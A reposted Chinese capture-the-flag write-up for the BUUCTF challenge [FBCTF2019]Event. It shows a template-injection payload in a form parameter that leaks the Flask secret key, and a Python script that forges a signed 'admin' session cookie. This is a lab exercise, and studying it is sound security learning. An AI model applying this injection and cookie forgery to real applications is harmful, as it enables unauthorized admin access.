欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  移动技术

BUUCTF:[FBCTF2019]Event

程序员文章站 2022-06-09 18:14:16
题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event模版注入+Cookie伪造Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU加密方式未知,密钥未知在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显接着查找配置文件:__class__.__init__.__globals__[app].config发现密钥,开始...

题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event
BUUCTF:[FBCTF2019]Event
BUUCTF:[FBCTF2019]Event
BUUCTF:[FBCTF2019]Event
模版注入+Cookie伪造

Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU
加密方式未知,密钥未知

在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显
BUUCTF:[FBCTF2019]Event
接着查找配置文件:__class__.__init__.__globals__[app].config
BUUCTF:[FBCTF2019]Event
发现密钥,开始伪造Cookie

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()
PS C:\Users\Administrator\Desktop> python .\exp.py
ImFkbWluIg.XyDKIw.wlPGRJ52VIGmXV5buLQ9-h-wt8w

将生成的Cookie替换user中的Cookie然后访问Admin panel

BUUCTF:[FBCTF2019]Event

本文地址:https://blog.csdn.net/mochu7777777/article/details/107653920